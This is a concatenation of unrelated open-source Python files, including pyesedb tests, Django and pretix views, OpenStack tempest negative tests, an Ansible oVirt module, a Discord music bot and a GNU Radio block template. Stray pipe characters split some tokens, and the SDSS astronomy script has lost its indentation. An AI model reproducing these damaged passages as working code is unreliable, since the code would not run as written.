        esedb_file.open_file_object(None)

      # Only read-only access is supported.
      with self.assertRaises(ValueError):
        esedb_file.open_file_object(file_object, mode="w")

  def test_close(self):
    """Tests the close function."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()

    # Closing a file that was never opened must fail.
    with self.assertRaises(IOError):
      esedb_file.close()

  def test_open_close(self):
    """Tests the open and close functions."""
    test_source = unittest.source
    if not test_source:
      # Fixed for consistency with the other tests: this previously did a
      # bare `return`, reporting the test as passed instead of skipped.
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()

    # Test open and close.
    esedb_file.open(test_source)
    esedb_file.close()

    # Test open and close a second time to validate clean up on close.
    esedb_file.open(test_source)
    esedb_file.close()

    if os.path.isfile(test_source):
      with open(test_source, "rb") as file_object:

        # Test open_file_object and close.
        esedb_file.open_file_object(file_object)
        esedb_file.close()

        # Test open_file_object and close a second time to validate clean up on close.
        esedb_file.open_file_object(file_object)
        esedb_file.close()

        # Test open_file_object and close and dereferencing file_object.
        esedb_file.open_file_object(file_object)
        del file_object
        esedb_file.close()

  def test_get_type(self):
    """Tests the get_type function and type property."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()
    esedb_file.open(test_source)

    # Renamed local from `type` to avoid shadowing the builtin.
    file_type = esedb_file.get_type()
    self.assertIsNotNone(file_type)

    self.assertIsNotNone(esedb_file.type)

    esedb_file.close()

  def test_get_page_size(self):
    """Tests the get_page_size function and page_size property."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()
    esedb_file.open(test_source)

    page_size = esedb_file.get_page_size()
    self.assertIsNotNone(page_size)

    self.assertIsNotNone(esedb_file.page_size)

    esedb_file.close()

  def test_get_number_of_tables(self):
    """Tests the get_number_of_tables function and number_of_tables property."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()
    esedb_file.open(test_source)

    number_of_tables = esedb_file.get_number_of_tables()
    self.assertIsNotNone(number_of_tables)

    self.assertIsNotNone(esedb_file.number_of_tables)

    esedb_file.close()
if __name__ == "__main__":
  argument_parser = argparse.ArgumentParser()
  argument_parser.add_argument(
      "source", nargs="?", action="store", metavar="PATH",
      default=None, help="path of the source file.")
  options, unknown_options = argument_parser.parse_known_args()
  # Re-insert the program name so unittest.main can parse the leftover args.
  unknown_options.insert(0, sys.argv[0])
  # Stash the source path on the unittest module for the tests above to read.
  setattr(unittest, "source", options.source)
  unittest.main(argv=unknown_options, verbosity=2)
|
trilan/lemon-publications | publications/feeds.py | Python | isc | 334 | 0 | from django.contrib.syndication.views import Feed
from django.utils import feedgenerator
class PublicationFeed(Feed):
    """Base RSS 2.0 feed for publication models.

    Subclasses must set ``model`` to a model whose default manager exposes
    a ``published()`` queryset method.
    """
    model = None
    feed_type = feedgenerator.Rss201rev2Feed
    def items(self):
        # First ten entries of the published() queryset.
        return self.model.objects.published()[:10]
    def item_pubdate(self, item):
        # The feed's pubDate reflects when publication started.
        return item.publication_start_date
|
deapplegate/wtgpipeline | warp_the_pickle_new.py | Python | mit | 33,252 | 0.022735 | #!/usr/bin/env python
import sys, glob,astropy, astropy | .io.fits as pyfits, os.path
#from numpy import *
import scipy
import scipy.interpolate.interpolate as interp
#from readtxtfile import readtxtfile
#from optparse import OptionParser
c = 299792458e10 #Angstroms/s
def get_sdss_spectra(gmi,umg,gmr,imz,number=4,tol=0.01,S_N=5):
import sqlcl
dict_names = ['plate', 'MJD', 'fiberID', 'ra', 'dec', 'mag_0 | ', 'mag_1', 'mag_2']
#query = 'select top ' + str(number) + ' ' + reduce(lambda x,y: x + ',' + y, ['s.' + x for x in dict_names]) + ' from specobjall as s join specphotoall as p on s.specobjid = p.specobjid where abs(s.mag_0 - s.mag_1 - ' + str(gmr) + ') < ' + str(tol) + ' and abs(s.mag_1 - s.mag_2 - ' + str(rmi) + ') < ' + str(tol) + ' and abs(s.mag_0 - s.mag_2 - ' + str(gmr + rmi) + ') < ' + str(tol) + ' and s.sn_0 > ' + str(S_N) + ' and s.sn_1 > ' + str(S_N) + ' and s.sn_2 > ' + str(S_N) + ' and abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 order by -1.*s.sn_1'
if False: pattern = 'zbelodiesptype like "%v%" and zbelodiesptype not like "%var%"'
#elif 0.7 < rmi < 1.0: pattern = '(zbelodiesptype like "%G%v%" or zbelodiesptype like "%K%v%" or zbelodiesptype like "%M%v%")'
else:
pattern = 'zbelodiesptype like "%M%v%"'
''' try to approximately match u and z band stellar colors as well, not just spectroscopic magnitudes '''
query = "select top " + str(number) + " " + reduce(lambda x,y: x + "," + y, ["s." + x for x in dict_names]) + " \
from specobjall as s join specphoto as p on s.specobjid = p.specobjid join sppParams sp on sp.specobjid = s.specobjid \
where zbclass='STAR' and " + pattern + " and abs(s.mag_0 - s.mag_2 - " + str(gmi) + ") < " + str(tol) + " and \
abs(s.mag_0 - s.mag_1 - " + str(gmr) + ") < " + str(tol) + " and abs(s.mag_1 - s.mag_2 - " + str(gmi - gmr) + ") < " + str(tol) + " and \
s.sn_0 > " + str(S_N) + " and s.sn_1 > " + str(S_N) + " and s.sn_2 > " + str(S_N) + " and \
abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 \
and abs(p.fibermag_u - p.fibermag_g - " + str(umg) + ") < 0.1 and abs(p.fibermag_i - p.fibermag_z - " + str(imz) + ") < 0.1 \
order by -1.*s.sn_1"
if rmi < 0.7: pattern = 'zbelodiesptype like "%v%" and zbelodiesptype not like "%var%"'
#elif 0.7 < rmi < 1.0: pattern = '(zbelodiesptype like "%G%v%" or zbelodiesptype like "%K%v%" or zbelodiesptype like "%M%v%")'
else: pattern = 'zbelodiesptype like "%M%v%"'
query = 'select top ' + str(number) + ' ' + reduce(lambda x,y: x + ',' + y, ['s.' + x for x in dict_names]) + ' from specobjall as s join specphoto as p on s.specobjid = p.specobjid join sppParams sp on sp.specobjid = s.specobjid where zbclass="STAR" and ' + pattern + ' and abs(s.mag_0 - s.mag_1 - ' + str(gmr) + ') < ' + str(tol) + ' and abs(s.mag_1 - s.mag_2 - ' + str(rmi) + ') < ' + str(tol) + ' and abs(s.mag_0 - s.mag_2 - ' + str(gmr + rmi) + ') < ' + str(tol) + ' and s.sn_0 > ' + str(S_N) + ' and s.sn_1 > ' + str(S_N) + ' and s.sn_2 > ' + str(S_N) + ' and abs(s.mag_0 - s.mag_1 - (p.fibermag_g - p.fibermag_r)) < 0.1 and abs(s.mag_1 - s.mag_2 - (p.fibermag_r - p.fibermag_i)) < 0.1 and abs(' + str(umg) + ' - (p.psfMag_u - p.psfMag_g)) < 0.05 and abs(' + str(imz) + ' - (p.psfMag_i - p.psfMag_z)) < 0.05 \
order by -1.*s.sn_1'
#select top 100 zbclass, zbelodiesptype, zbsubclass from sppParams where zbsubclass like '%M%' and zbclass='STAR'
import time
time.sleep(1.5)
print query
lines = sqlcl.query(query).readlines()
print lines
dicts = []
if lines[0] != 'N':
for line in lines[1:]:
dict = {}
line = line.replace('\n','')
import re
res = re.split(',',line)
print res
for i in range(len(res)):
if dict_names[i] == 'fiberID' or dict_names[i] == 'plate' or dict_names[i] == 'MJD':
dict[dict_names[i]] = int(res[i])
else:
dict[dict_names[i]] = (res[i])
print dict
dicts.append(dict)
print dicts
return dicts
def retrieve_sdss_spectra(dict,plot=False):
dict['gmr'] = float(dict['mag_0']) - float(dict['mag_1'])
dict['rmi'] = float(dict['mag_1']) - float(dict['mag_2'])
print dict
file = "http://das.sdss.org/spectro/1d_26/%(plate)04d/1d/spSpec-%(MJD)d-%(plate)04d-%(fiberID)03d.fit" % dict
#output = "/tmp/spSpec-%(MJD)d-%(plate)04d-%(fiberID)d.fit" % dict
#os.system('wget ' + file + ' -O ' + output)
print file
import astropy, astropy.io.fits as pyfits, scipy
import scipy
p = pyfits.open(file)
mask = p[0].data[3]
flux = p[0].data[0]
indices = scipy.array(range(len(flux)))
#flux = flux[mask==0]
#indices = indices[mask==0]
#mask = mask[mask==0]
print mask
COEFF0 = p[0].header['COEFF0']
COEFF1 = p[0].header['COEFF1']
import scipy
wavelength = 10.**(COEFF0 + COEFF1*indices)
spectrum = []
for i in range(len(indices)):
spectrum.append([wavelength[i],flux[i]])
import scipy
spectrum = scipy.array(spectrum)
if plot:
import pylab
pylab.plot(spectrum[:,0], spectrum[:,1])
pylab.xlabel('angstroms')
pylab.ylabel('flux')
pylab.show()
return spectrum
def make_new_spectrum(locus_index,plot=False):
filters = get_filters()
import pickle
f = open('picklelocus_MACS','r')
m = pickle.Unpickler(f)
stars = m.load()
import string
spectra_complete = load_spectra()
locus_list = locus()
comp_list = filter(lambda x: string.find(x.replace('SDSS_',''),'SDSS')!=-1 and string.find(x,'SDSS_')!=-1, locus_list.keys())
print comp_list
import pylab
gmi_all = locus_list['GSDSS_ISDSS'][:]
umg_all = locus_list['USDSS_GSDSS'][:]
gmr_all = locus_list['GSDSS_RSDSS'][:]
imz_all = locus_list['ISDSS_ZSDSS'][:]
#locus_index = 13
print 'locus_index', locus_index
gmi = locus_list['GSDSS_ISDSS'][locus_index]
umg = locus_list['USDSS_GSDSS'][locus_index]
gmr = locus_list['GSDSS_RSDSS'][locus_index]
imz = locus_list['ISDSS_ZSDSS'][locus_index]
print gmi, umg, gmr, imz
if plot:
pylab.clf()
pylab.scatter(gmr_all,rmi_all,color='blue')
pylab.scatter(gmr,rmi,color='red')
pylab.show()
if False:
closest = closest_pickles(stars, locus_list, locus_index, comp_list)
closest_index = closest[1][1]
import pylab
print 'plotting'
print spectra_complete[closest_index][0][:,0]
print spectra_complete[closest_index][0][:,1]
pylab.plot(spectra_complete[closest_index][0][:,0],spectra_complete[closest_index][0][:,1])
pylab.xlim(3000,11000)
pylab.show()
print 'plotted'
import pickle
f = open('picklelocus_MACS','r')
m = pickle.Unpickler(f)
stars = m.load()
locus_list = locus()
good = False
gmi_off = 0
gmr_off = 0
trys = 0
tol = 0.01
while not good:
trys += 1
#if trys > 4: tol = 0.02
#if trys > 6: tol = 0.03
#if trys > 10: tol = 0.05
print gmi, umg, gmr, imz
dicts = get_sdss_spectra(gmi-gmi_off,umg,gmr-gmr_off,imz,tol=tol)
if len(dicts):
print dicts
gmi_diffs = []
gmr_diffs = []
for dict in dicts:
spectrum = retrieve_sdss_spectra(dict,plot=False)
mags = synth([1.],[[spectrum]],filters,show= |
akuks/pretix | src/pretix/control/views/main.py | Python | apache-2.0 | 2,498 | 0 | from django.conf import settings
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.shortcuts import render
from django.utils.translation import ugettext_lazy as _
from django.views.generic import CreateView, ListView, TemplateView
from pretix.base.models import Event, EventPermission, OrganizerPermission
from pretix.control.forms.event import EventCreateForm
from pretix.control.permissions import OrganizerPermissionRequiredMixin
class EventList(ListView):
model = Event
context_object_name = 'events'
paginate_by = 30
template_name = 'pretixcontrol/events/index.html'
def get_queryset(self):
return Event.objects.current.filter(
permitted__id__ex | act=self.request.user.pk
).prefetch_related(
"organizer",
)
def index(request):
return render(request, 'pretixcontrol/dashboard.html', {})
class EventCreateStart(TemplateView):
template_name = 'pretixcontrol/events/start.html'
def get_context_data(self, **kwargs):
ctx = super().get_context_d | ata(**kwargs)
ctx['organizers'] = [
p.organizer for p in OrganizerPermission.objects.current.filter(
user=self.request.user, can_create_events=True
).select_related("organizer")
]
return ctx
class EventCreate(OrganizerPermissionRequiredMixin, CreateView):
model = Event
form_class = EventCreateForm
template_name = 'pretixcontrol/events/create.html'
context_object_name = 'event'
permission = 'can_create_events'
def dispatch(self, request, *args, **kwargs):
return super().dispatch(request, *args, **kwargs)
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['organizer'] = self.request.organizer
return kwargs
def form_valid(self, form):
messages.success(self.request, _('The new event has been created.'))
form.instance.organizer = self.request.organizer
ret = super().form_valid(form)
EventPermission.objects.create(
event=form.instance, user=self.request.user,
)
self.object = form.instance
self.object.plugins = settings.PRETIX_PLUGINS_DEFAULT
self.object.save()
return ret
def get_success_url(self) -> str:
return reverse('control:event.settings', kwargs={
'organizer': self.request.organizer.slug,
'event': self.object.slug,
})
|
IPVL/Tanvin-PythonWorks | chapter5/codes/forLoop.py | Python | mit | 353 | 0.016997 | #! / | usr/bin/env python
# example of for loop
words = ['this', 'is', 'an', 'ex', 'parrot']
for word in words:
print word,
print '\n'
# example of for loop in dictionary
d = {'x': 1, 'y': 2, 'z': 3}
for key in d:
print key, 'corresponds to', d[key]
# additional sequence unpacking in for loop
for key, value in d.items():
print key, 'to', val | ue |
tudorvio/tempest | tempest/api/compute/servers/test_servers_negative.py | Python | apache-2.0 | 21,412 | 0 | # Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language g | overning permissions and limitations
# under the License.
import sys
from tempest_lib import exceptions as lib_exc
import testtools
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest.common import waiters
from tempe | st import config
from tempest import test
CONF = config.CONF
class ServersNegativeTestJSON(base.BaseV2ComputeTest):
credentials = ['primary', 'alt']
def setUp(self):
super(ServersNegativeTestJSON, self).setUp()
try:
waiters.wait_for_server_status(self.client, self.server_id,
'ACTIVE')
except Exception:
self.__class__.server_id = self.rebuild_server(self.server_id)
def tearDown(self):
self.server_check_teardown()
super(ServersNegativeTestJSON, self).tearDown()
@classmethod
def setup_clients(cls):
super(ServersNegativeTestJSON, cls).setup_clients()
cls.client = cls.servers_client
cls.alt_client = cls.os_alt.servers_client
@classmethod
def resource_setup(cls):
super(ServersNegativeTestJSON, cls).resource_setup()
server = cls.create_test_server(wait_until='ACTIVE')
cls.server_id = server['id']
@test.attr(type=['negative'])
@test.idempotent_id('dbbfd247-c40c-449e-8f6c-d2aa7c7da7cf')
def test_server_name_blank(self):
# Create a server with name parameter empty
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
name='')
@test.attr(type=['negative'])
@test.idempotent_id('b8a7235e-5246-4a8f-a08e-b34877c6586f')
def test_personality_file_contents_not_encoded(self):
# Use an unencoded file when creating a server with personality
file_contents = 'This is a test file.'
person = [{'path': '/etc/testfile.txt',
'contents': file_contents}]
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
personality=person)
@test.attr(type=['negative'])
@test.idempotent_id('fcba1052-0a50-4cf3-b1ac-fae241edf02f')
def test_create_with_invalid_image(self):
# Create a server with an unknown image
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
image_id=-1)
@test.attr(type=['negative'])
@test.idempotent_id('18f5227f-d155-4429-807c-ccb103887537')
def test_create_with_invalid_flavor(self):
# Create a server with an unknown flavor
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
flavor=-1,)
@test.attr(type=['negative'])
@test.idempotent_id('7f70a4d1-608f-4794-9e56-cb182765972c')
def test_invalid_access_ip_v4_address(self):
# An access IPv4 address must match a valid address pattern
IPv4 = '1.1.1.1.1.1'
self.assertRaises(lib_exc.BadRequest,
self.create_test_server, accessIPv4=IPv4)
@test.attr(type=['negative'])
@test.idempotent_id('5226dd80-1e9c-4d8a-b5f9-b26ca4763fd0')
def test_invalid_ip_v6_address(self):
# An access IPv6 address must match a valid address pattern
IPv6 = 'notvalid'
self.assertRaises(lib_exc.BadRequest,
self.create_test_server, accessIPv6=IPv6)
@test.idempotent_id('7ea45b3e-e770-46fa-bfcc-9daaf6d987c0')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_nonexistent_server(self):
# Resize a non-existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.client.resize,
nonexistent_server, self.flavor_ref)
@test.idempotent_id('ced1a1d7-2ab6-45c9-b90f-b27d87b30efd')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_server_with_non_existent_flavor(self):
# Resize a server with non-existent flavor
nonexistent_flavor = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest, self.client.resize,
self.server_id, flavor_ref=nonexistent_flavor)
@test.idempotent_id('45436a7d-a388-4a35-a9d8-3adc5d0d940b')
@testtools.skipUnless(CONF.compute_feature_enabled.resize,
'Resize not available.')
@test.attr(type=['negative'])
def test_resize_server_with_null_flavor(self):
# Resize a server with null flavor
self.assertRaises(lib_exc.BadRequest, self.client.resize,
self.server_id, flavor_ref="")
@test.attr(type=['negative'])
@test.idempotent_id('d4c023a0-9c55-4747-9dd5-413b820143c7')
def test_reboot_non_existent_server(self):
# Reboot a non existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound, self.client.reboot,
nonexistent_server, 'SOFT')
@test.idempotent_id('d1417e7f-a509-41b5-a102-d5eed8613369')
@testtools.skipUnless(CONF.compute_feature_enabled.pause,
'Pause is not available.')
@test.attr(type=['negative'])
def test_pause_paused_server(self):
# Pause a paused server.
self.client.pause_server(self.server_id)
waiters.wait_for_server_status(self.client, self.server_id, 'PAUSED')
self.assertRaises(lib_exc.Conflict,
self.client.pause_server,
self.server_id)
self.client.unpause_server(self.server_id)
@test.attr(type=['negative'])
@test.idempotent_id('98fa0458-1485-440f-873b-fe7f0d714930')
def test_rebuild_reboot_deleted_server(self):
# Rebuild and Reboot a deleted server
server = self.create_test_server()
self.client.delete_server(server['id'])
waiters.wait_for_server_termination(self.client, server['id'])
self.assertRaises(lib_exc.NotFound,
self.client.rebuild,
server['id'], self.image_ref_alt)
self.assertRaises(lib_exc.NotFound, self.client.reboot,
server['id'], 'SOFT')
@test.attr(type=['negative'])
@test.idempotent_id('d86141a7-906e-4731-b187-d64a2ea61422')
def test_rebuild_non_existent_server(self):
# Rebuild a non existent server
nonexistent_server = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.client.rebuild,
nonexistent_server,
self.image_ref_alt)
@test.attr(type=['negative'])
@test.idempotent_id('fd57f159-68d6-4c2a-902b-03070828a87e')
def test_create_numeric_server_name(self):
server_name = 12345
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
name=server_name)
@test.attr(type=['negative'])
@test.idempotent_id('c3e0fb12-07fc-4d76-a22e-37409887afe8')
def test_create_server_name_length_exceeds_256(self):
# Create a server with name length exceeding 256 characters
server_name = 'a' * 256
self.assertRaises(lib_exc.BadRequest,
self.create_test_server,
|
Dhivyap/ansible | lib/ansible/modules/cloud/ovirt/ovirt_host_info.py | Python | gpl-3.0 | 4,875 | 0.002667 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_host_info
short_description: Retrieve information about one or more oVirt/RHV hosts
author: "Ondra Machacek (@machacekondra)"
version_added: "2.3"
description:
- "Retrieve information about one or more oVirt/RHV hosts."
- This module was called C(ovirt_host_facts) before Ansible 2.9, returning C(ansible_facts).
Note that the M(ovirt_host_info) module no longer returns C(ansible_facts)!
notes:
- "This module returns a variable C(ovirt_hosts), which
contains a list of hosts. You need to register the result with
the I(register) keyword to use it."
options:
pattern:
description:
- "Search term which is accepted by oVirt/RHV search backend."
- "For example to search host X from datacenter Y use following pattern:
name=X and datacenter=Y"
all_content:
description:
- "If I(true) all the attributes of the hosts should be
included in the response."
default: False
version_added: "2.7"
type: bool
cluster_version:
description:
- "Filter the hosts based on the cluster version."
type: str
version_added: "2.8"
extends_documentation_fragment: ovirt_info
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Gather information about all hosts which names start with C(host) and
# belong to data center C(west):
- ovirt_host_info:
patt | ern: name=host* and datacenter=west
register: result
- debug:
msg: "{{ result.o | virt_hosts }}"
# All hosts with cluster version 4.2:
- ovirt_host_info:
pattern: name=host*
cluster_version: "4.2"
register: result
- debug:
msg: "{{ result.ovirt_hosts }}"
'''
RETURN = '''
ovirt_hosts:
description: "List of dictionaries describing the hosts. Host attributes are mapped to dictionary keys,
all hosts attributes can be found at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/host."
returned: On success.
type: list
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
check_sdk,
create_connection,
get_dict_of_struct,
ovirt_info_full_argument_spec,
)
def get_filtered_hosts(cluster_version, hosts, connection):
# Filtering by cluster version returns only those which have same cluster version as input
filtered_hosts = []
for host in hosts:
cluster = connection.follow_link(host.cluster)
cluster_version_host = str(cluster.version.major) + '.' + str(cluster.version.minor)
if cluster_version_host == cluster_version:
filtered_hosts.append(host)
return filtered_hosts
def main():
argument_spec = ovirt_info_full_argument_spec(
pattern=dict(default='', required=False),
all_content=dict(default=False, type='bool'),
cluster_version=dict(default=None, type='str'),
)
module = AnsibleModule(argument_spec)
is_old_facts = module._name == 'ovirt_host_facts'
if is_old_facts:
module.deprecate("The 'ovirt_host_facts' module has been renamed to 'ovirt_host_info', "
"and the renamed one no longer returns ansible_facts", version='2.13')
check_sdk(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
hosts_service = connection.system_service().hosts_service()
hosts = hosts_service.list(
search=module.params['pattern'],
all_content=module.params['all_content']
)
cluster_version = module.params.get('cluster_version')
if cluster_version is not None:
hosts = get_filtered_hosts(cluster_version, hosts, connection)
result = dict(
ovirt_hosts=[
get_dict_of_struct(
struct=c,
connection=connection,
fetch_nested=module.params.get('fetch_nested'),
attributes=module.params.get('nested_attributes'),
) for c in hosts
],
)
if is_old_facts:
module.exit_json(changed=False, ansible_facts=result)
else:
module.exit_json(changed=False, **result)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == '__main__':
main()
|
T3CHNOLOG1C/Plaidohlect | MusicBot/musicbot/bot.py | Python | apache-2.0 | 78,817 | 0.00373 | import os
import sys
import time
import shlex
import shutil
import inspect
import aiohttp
import discord
import asyncio
import traceback
from discord import utils
from discord.object import Object
from discord.enums import ChannelType
from discord.voice_client import VoiceClient
from discord.ext.commands.bot import _get_variable
from io import BytesIO
from functools import wraps
from textwrap import dedent
from datetime import timedelta
from random import choice, shuffle
from collections import defaultdict
from musicbot.playlist import Playlist
from musicbot.player import MusicPlayer
from musicbot.config import Config, ConfigDefaults
from musicbot.permissions import Permissions, PermissionsDefaults
from musicbot.utils import load_file, write_file, sane_round_int
from . import exceptions
from . import downloader
from .opus_loader import load_opus_lib
from .constants import VERSION as BOTVERSION
from .constants import DISCORD_MSG_CHAR_LIMIT, AUDIO_CACHE_PATH
load_opus_lib()
class SkipState:
def __init__(self):
self.skippers = set()
self.skip_msgs = set()
@property
def skip_count(self):
return len(self.skippers)
def reset(self):
self.skippers.clear()
self.skip_msgs.clear()
def add_skipper(self, skipper, msg):
self.skippers.add(skipper)
self.skip_msgs.add(msg)
return self.skip_count
class Response:
def __init__(self, content, reply=False, delete_after=0):
self.content = content
self.reply = reply
self.delete_after = delete_after
class MusicBot(discord.Client):
def __init__(self, config_file=ConfigDefaults.options_file, perms_file=PermissionsDefaults.perms_file):
self.players = {}
self.the_voice_clients = {}
self.locks = defaultdict(asyncio.Lock)
self.voice_client_connect_lock = asyncio.Lock()
self.voice_client_move_lock = asyncio.Lock()
self.config = Config(config_file)
self.permissions = Permissions(perms_file, grant_all=[self.config.owner_id])
self.blacklist = set(load_file(self.config.blacklist_file))
self.autoplaylist = load_file(self.config.auto_playlist_file)
self.downloader = downloader.Downloader(download_folder='audio_cache')
self.exit_signal = None
self.init_ok = False
self.cached_client_id = None
if not self.autoplaylist:
print("Warning: Autoplaylist is empty, disabling.")
self.config.auto_playlist = False
# TODO: Do these properly
ssd_defaults = {'last_np_msg': None, 'auto_paused': False}
self.server_specific_data = defaultdict(lambda: dict(ssd_defaults))
super().__init__()
self.aiosession = aiohttp.ClientSession(loop=self.loop)
self.http.user_agent += ' MusicBot/%s' % BOTVERSION
# TODO: | Add some sort of `denied` | argument for a message to send when someone else tries to use it
def owner_only(func):
@wraps(func)
async def wrapper(self, *args, **kwargs):
# Only allow the owner to use these commands
orig_msg = _get_variable('message')
if not orig_msg or orig_msg.author.id == self.config.owner_id:
return await func(self, *args, **kwargs)
else:
raise exceptions.PermissionsError("only the owner can use this command", expire_in=30)
return wrapper
@staticmethod
def _fixg(x, dp=2):
return ('{:.%sf}' % dp).format(x).rstrip('0').rstrip('.')
def _get_owner(self, voice=False):
if voice:
for server in self.servers:
for channel in server.channels:
for m in channel.voice_members:
if m.id == self.config.owner_id:
return m
else:
return discord.utils.find(lambda m: m.id == self.config.owner_id, self.get_all_members())
def _delete_old_audiocache(self, path=AUDIO_CACHE_PATH):
try:
shutil.rmtree(path)
return True
except:
try:
os.rename(path, path + '__')
except:
return False
try:
shutil.rmtree(path)
except:
os.rename(path + '__', path)
return False
return True
# TODO: autosummon option to a specific channel
async def _auto_summon(self):
owner = self._get_owner(voice=True)
if owner:
self.safe_print("Found owner in \"%s\", attempting to join..." % owner.voice_channel.name)
# TODO: Effort
await self.cmd_summon(owner.voice_channel, owner, None)
return owner.voice_channel
async def _autojoin_channels(self, channels):
joined_servers = []
for channel in channels:
if channel.server in joined_servers:
print("Already joined a channel in %s, skipping" % channel.server.name)
continue
if channel and channel.type == discord.ChannelType.voice:
self.safe_print("Attempting to autojoin %s in %s" % (channel.name, channel.server.name))
chperms = channel.permissions_for(channel.server.me)
if not chperms.connect:
self.safe_print("Cannot join channel \"%s\", no permission." % channel.name)
continue
elif not chperms.speak:
self.safe_print("Will not join channel \"%s\", no permission to speak." % channel.name)
continue
try:
player = await self.get_player(channel, create=True)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
joined_servers.append(channel.server)
except Exception as e:
if self.config.debug_mode:
traceback.print_exc()
print("Failed to join", channel.name)
elif channel:
print("Not joining %s on %s, that's a text channel." % (channel.name, channel.server.name))
else:
print("Invalid channel thing: " + channel)
async def _wait_delete_msg(self, message, after):
await asyncio.sleep(after)
await self.safe_delete_message(message)
# TODO: Check to see if I can just move this to on_message after the response check
async def _manual_delete_check(self, message, *, quiet=False):
if self.config.delete_invoking:
await self.safe_delete_message(message, quiet=quiet)
async def _check_ignore_non_voice(self, msg):
vc = msg.server.me.voice_channel
# If we've connected to a voice chat and we're in the same voice channel
if not vc or vc == msg.author.voice_channel:
return True
else:
raise exceptions.PermissionsError(
"you cannot use this command when not in the voice channel (%s)" % vc.name, expire_in=30)
async def generate_invite_link(self, *, permissions=None, server=None):
if not self.cached_client_id:
appinfo = await self.application_info()
self.cached_client_id = appinfo.id
return discord.utils.oauth_url(self.cached_client_id, permissions=permissions, server=server)
async def get_voice_client(self, channel):
if isinstance(channel, Object):
channel = self.get_channel(channel.id)
if getattr(channel, 'type', ChannelType.text) != ChannelType.voice:
raise AttributeError('Channel passed must be a voice channel')
with await self.voice_client_connect_lock:
server = channel.server
if server.id in self.the_voice_clients:
return self.the_voice_clients[server.id]
s_id = self.ws.wait_for('VOICE_STATE_UPDATE', lambda d: d.get('user_id') == self.user.id)
_voice_data = self.ws.wait_for('VOICE_SERVER_UPDATE |
skoslowski/gnuradio | grc/core/blocks/embedded_python.py | Python | gpl-3.0 | 8,172 | 0.000857 | # Copyright 2015-16 Free Software Foundation, Inc.
# This file is part of GNU Radio
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
from __future__ import absolute_import
from ast import literal_eval
from textwrap import dedent
from . import Block, register_build_in
from ._templates import MakoTemplates
from .. import utils
from ..base import Element
from ._build import build_params
DEFAULT_CODE = '''\
"""
Embedded Python Blocks:
Each time this file is saved, GRC will instantiate the first class it finds
to get ports and parameters of your block. The arguments to __init__ will
be the parameters. All of them are required to have default values!
"""
import numpy as np
from gnuradio import gr
class blk(gr.sync_block): # other base classes are basic_block, decim_block, interp_block
"""Embedded Python Block example - a simple multiply const"""
def __init__(self, example_param=1.0): # only default arguments here
"""arguments to this function show up as parameters in GRC"""
gr.sync_block.__init__(
self,
name='Embedded Python Block', # will show up in GRC
in_sig=[np.complex64],
out_sig=[np.complex64]
)
# if an attribute with the same name as a parameter is found,
# a callback is registered (properties work, too).
self.example_param = example_param
def work(self, input_items, output_items):
"""example: multiply with constant"""
output_items[0][:] = input_items[0] * self.example_param
return len(output_items[0])
'''
DOC = """
This block represents an arbitrary GNU Radio Python Block.
Its source code can be accessed through the parameter 'Code' which opens your editor. \
Each time you save changes in the editor, GRC will update the block. \
This includes the number, names and defaults of the parameters, \
the ports (stream and message) and the block name and documentation.
Block Documentation:
(will be replaced the docstring of your block class)
"""
@register_build_in
class EPyBlock(Block):
key = "epy_block"
label = "Python Block"
documentation = {"": DOC}
parameters_data = build_params(
params_raw=[
dict(
label="Code",
id="_source_code",
dtype="_multiline_python_external",
default=DEFAULT_CODE,
hide="part",
)
],
have_inputs=True,
have_outputs=True,
flags=Block.flags,
block_id=key,
)
